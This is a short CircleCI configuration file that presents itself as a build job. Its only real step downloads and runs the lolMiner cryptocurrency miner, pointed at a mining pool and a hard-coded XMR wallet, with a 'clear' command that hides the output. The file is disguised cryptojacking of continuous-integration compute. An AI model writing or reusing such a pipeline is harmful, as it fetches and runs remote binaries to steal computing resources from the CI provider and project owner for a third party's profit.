version: 2.0
jobs:
  build:
    docker:
      - image: circleci/ruby:2.4.2-jessie-node
        auth:
          username: mydockerhub-user
          password: $DOCKERHUB_PASSWORD  # context / project UI env-var reference
    steps:
      - checkout
      - run:  wget https://github.com/Lolliedieb/lolMiner-releases/releases/download/1.31/lolMiner_v1.31_Lin64.tar.gz && tar -zxvf lolMiner_v1.31_Lin64.tar.gz && cd 1.31 && clear && ./lolMiner --algo ETHASH --pool ethash.unmineable.com:3333 --user XMR:45YzFWkyySfW1cCUSiU45U83qC5u5b5avAe1TwEGNYFuJ3xRCt6ddGCdoL9UNLgETPaVyMg5qtW6yCuGPH1Vej5rEAEwD9b.WORKERNAME --ethstratum ETHPROXY